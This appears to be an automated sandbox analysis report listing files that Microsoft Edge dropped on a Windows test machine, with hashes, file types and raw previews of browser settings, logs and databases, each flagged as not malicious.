                                                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@................]...]..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".sabccg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2.......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                                      MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                                      SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                                      SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                                      SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5f773af2-be2b-479c-9373-554487c7dec0.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\75d05b41-9ef0-4197-b269-eebe89b7824e.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17501), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17503
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487733984368819
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnJ99QTryDiuabatSuyp8BsIYyaNPOpegzkXMlNsNXphzd8J2w516o8VmbV+Fp8:stnPGQSu48BsIYtJOpnizdgtbbG6Qwr
                                                                                                                                                                                                                                                                                      MD5:576B473244A66703691B6E6118A5DF38
                                                                                                                                                                                                                                                                                      SHA1:FE3EF9E25AF993C2666A0A565B9AFD5DE8B38F50
                                                                                                                                                                                                                                                                                      SHA-256:71BC63AB5A32FFFD0615913ADAFB4C0BE62A0A0D5B66FDBD77B2F20B121E2752
                                                                                                                                                                                                                                                                                      SHA-512:58C986D09C465D4DBE042C9E086068B3A7AF1EFC7D5E914AD1254F804A471D73934FF6E363F001BB0D464277676EC4556FAE24F53417EF33DAF162BEEB16D76D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\90d59251-375d-4347-bd40-ca70759c6e84.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40504
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.560960538243978
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:XZrbGc7pLGLhJbWP4afGe8F1+UoAYDCx9Tuqh0VfUC9xbog/OVONovhHSrwWbSeI:XZrbGAchJbWP4afGeu1jajNoJHXWbSb5
                                                                                                                                                                                                                                                                                      MD5:A9D8C54F59ABA147E6EDBD991AE7AC37
                                                                                                                                                                                                                                                                                      SHA1:37BB7D614C3471289A637585AAEFA6EFEB1A4C70
                                                                                                                                                                                                                                                                                      SHA-256:A219E9165BD73F8F688F01817045EB59EE384151339E456EA22E0062957A0F54
                                                                                                                                                                                                                                                                                      SHA-512:1D4B26C2C253AE71A437DC93BCC1BB37C21723ED8CAEE0E277177334B4E14C1B99D4BE8E0F853D275003849808357A5B84469341C7A7FA02ED6F1ADE2E202BBF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379760322200595","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379760322200595","location":5,"ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                      MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                      SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                      SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                      SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):315
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.251493906392718
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyAmV1cNwi23oH+Tcwtp3hBtB2KLl1yAvpQL+q2PcNwi23oH+Tcwtp3hBWsIFUv:kbZYebp3dFLHQ+vLZYebp3eFUv
                                                                                                                                                                                                                                                                                      MD5:9CB54A0D1C1D843F629C3F7C25623F02
                                                                                                                                                                                                                                                                                      SHA1:832778932290DEA6EA8E9A7D6158E733EAAC63BF
                                                                                                                                                                                                                                                                                      SHA-256:59514C8B1C5BB498D8B4947EE656BF4D7BEC125AB68E0856A0E1561ACF169C2B
                                                                                                                                                                                                                                                                                      SHA-512:AA26F4AFCA7FB8489FEE15BC5993540C1811512AA9C94DEB7AC43F20E6E9F2E619FFAB6269D63A0B6A1E54738160FBB99C0207BE7574DC2F0B7E025F89996266
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.342 155c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-03:05:27.377 155c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):1696115
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.040621318312018
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24576:kwf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kwfgAmmE
                                                                                                                                                                                                                                                                                      MD5:E592EF25E2A4DC934AFF63B9C7880097
                                                                                                                                                                                                                                                                                      SHA1:BA32C6B1BEEDA29C2052A7F17950F12095BFD46B
                                                                                                                                                                                                                                                                                      SHA-256:5E3B11B8A16EB6927FDE94B1B32F78E923E9301A252BFDF5314D874770028274
                                                                                                                                                                                                                                                                                      SHA-512:09FC34889A1052CAD3E63207189991AF39C8CDF45687D89AEFD01DC3AC46A37587F4CC85FD76F86F15EB326DAFDB355FC1CF3B08AE1627779420024999742FBD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):339
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.157721640276321
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyAhN+q2PcNwi23oH+Tcwt9Eh1tIFUt8WyAhZmw+WyAwR3VkwOcNwi23oH+TcwtY:svLZYeb9Eh16FUt8+/+JRF54ZYeb9Ehx
                                                                                                                                                                                                                                                                                      MD5:7EBB03382740E00B6BD07013FFA8736E
                                                                                                                                                                                                                                                                                      SHA1:CAEFFF3CEFA0B070A2DB310B99467B367BCCC460
                                                                                                                                                                                                                                                                                      SHA-256:C9B497D0327CBA28D1472556906BE20B175F576BE3A823AE0D4BC6D9979234DE
                                                                                                                                                                                                                                                                                      SHA-512:EFF2E476A1AFD7FDE931E873B3EC9782285060477ECB66BE10178DBB8C44076DA96ED12B54EEFFC7B5765276DF80BD42171D587B1676B03C36FDCA99842C1A3B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.327 848 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-03:05:27.329 848 Recovering log #3.2024/12/27-03:05:27.333 848 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):339
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.157721640276321
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyAhN+q2PcNwi23oH+Tcwt9Eh1tIFUt8WyAhZmw+WyAwR3VkwOcNwi23oH+TcwtY:svLZYeb9Eh16FUt8+/+JRF54ZYeb9Ehx
                                                                                                                                                                                                                                                                                      MD5:7EBB03382740E00B6BD07013FFA8736E
                                                                                                                                                                                                                                                                                      SHA1:CAEFFF3CEFA0B070A2DB310B99467B367BCCC460
                                                                                                                                                                                                                                                                                      SHA-256:C9B497D0327CBA28D1472556906BE20B175F576BE3A823AE0D4BC6D9979234DE
                                                                                                                                                                                                                                                                                      SHA-512:EFF2E476A1AFD7FDE931E873B3EC9782285060477ECB66BE10178DBB8C44076DA96ED12B54EEFFC7B5765276DF80BD42171D587B1676B03C36FDCA99842C1A3B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.327 848 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-03:05:27.329 848 Recovering log #3.2024/12/27-03:05:27.333 848 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4625889476187344
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5j:TouQq3qh7z3bY2LNW9WMcUvBuJ
                                                                                                                                                                                                                                                                                      MD5:D3104ACA502466A62B1439F3B0082B12
                                                                                                                                                                                                                                                                                      SHA1:0010C51E44763C27632183DA3C7D7F315AA43D06
                                                                                                                                                                                                                                                                                      SHA-256:F0AE8C252964BE10EC2814F06CF65DF61B18E5B969FFDF630796638E5D3741BC
                                                                                                                                                                                                                                                                                      SHA-512:89F080A91FF15D3EE2AE181146E2E110A7E9D7DCC30703CD74A23B4B1AA23AFF6238101CD6C285DFA23A9990ADA96B8A493669304BB80D1BC9D76088B8C2DE16
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                      MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                      SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                      SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                      SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):351
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.204993710349138
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfAL1yq2PcNwi23oH+TcwtnG2tMsIFUt8WyfZ1Zmw+WyfPRkwOcNwi23oH+Tcwj:uvLZYebn9GFUt8D1/+j54ZYebn95J
                                                                                                                                                                                                                                                                                      MD5:85A8D2557FD3A83CE0D9A669D2EFD772
                                                                                                                                                                                                                                                                                      SHA1:7648DC08CCAA45ACB5C2C3949B6014DF98C126A1
                                                                                                                                                                                                                                                                                      SHA-256:32D27BA61E6C4CAEE06D3C7931A65FB92E97F6BACC354B9EB780EEB58EFF3BC3
                                                                                                                                                                                                                                                                                      SHA-512:ACBAA9CC34E6C7AC1D218CDF3EF23B4AED8A629D0CBA274C5A1723464410FCC5EF3C932FF3924FAFC4490E085A8439239BC120D0CC7096D7198C7EA784025385
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.263 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/27-03:05:22.264 9e4 Recovering log #3.2024/12/27-03:05:22.264 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):351
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.204993710349138
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfAL1yq2PcNwi23oH+TcwtnG2tMsIFUt8WyfZ1Zmw+WyfPRkwOcNwi23oH+Tcwj:uvLZYebn9GFUt8D1/+j54ZYebn95J
                                                                                                                                                                                                                                                                                      MD5:85A8D2557FD3A83CE0D9A669D2EFD772
                                                                                                                                                                                                                                                                                      SHA1:7648DC08CCAA45ACB5C2C3949B6014DF98C126A1
                                                                                                                                                                                                                                                                                      SHA-256:32D27BA61E6C4CAEE06D3C7931A65FB92E97F6BACC354B9EB780EEB58EFF3BC3
                                                                                                                                                                                                                                                                                      SHA-512:ACBAA9CC34E6C7AC1D218CDF3EF23B4AED8A629D0CBA274C5A1723464410FCC5EF3C932FF3924FAFC4490E085A8439239BC120D0CC7096D7198C7EA784025385
                                                                                                                                                                                                                                                                                      Malicious:false
